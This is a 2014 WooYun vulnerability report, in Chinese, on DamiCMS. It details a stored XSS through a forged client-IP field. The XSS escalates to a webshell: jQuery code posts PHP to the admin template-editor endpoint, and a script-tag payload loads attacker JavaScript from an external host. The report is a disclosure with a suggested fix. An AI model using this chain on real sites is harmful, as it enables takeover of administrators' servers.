漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-081381
漏洞标题:damicms存储xss导致getshell
相关厂商:damicms.com
漏洞作者: wilson
提交时间:2014-11-01 10:50
修复时间:2014-12-30 14:44
公开时间:2014-12-30 14:44
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:5
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-01: 细节已通知厂商并且等待厂商处理中
2014-11-06: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-12-31: 细节向核心白帽子及相关领域专家公开
2015-01-10: 细节向普通白帽子公开
2015-01-20: 细节向实习白帽子公开
2014-12-30: 细节向公众公开
简要描述:
damicms存储xss导致getshell
详细说明:
1)Xss
Damicms使用了万恶的
get_client_ip()
直接伪造ip,而且ip的字段是varchar(50) 够我xss了
然后:
Ok
2)xss导致getshell
由于后台 可以直接编辑文件,生成php马
那我们就用js来直接getshell
Js如下:
$.ajax({
"url": "http://192.168.153.132/dami/admin.php?s=/Tpl/Update",
"type": "POST",
"data": "filename=./Web/Tpl/w3g/list/4.php&content=<?php phpinfo();?>"
})
2.Payload:
<script src=//xxxxxx/1.js></script>
然后模拟管理员上线...
ok 成功getshell
漏洞证明:
见前面
修复方案:
对ip进行过滤
版权声明:转载请注明来源 wilson@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-12-30 14:44
厂商回复:
最新状态:
2014-11-06:3.9已经修正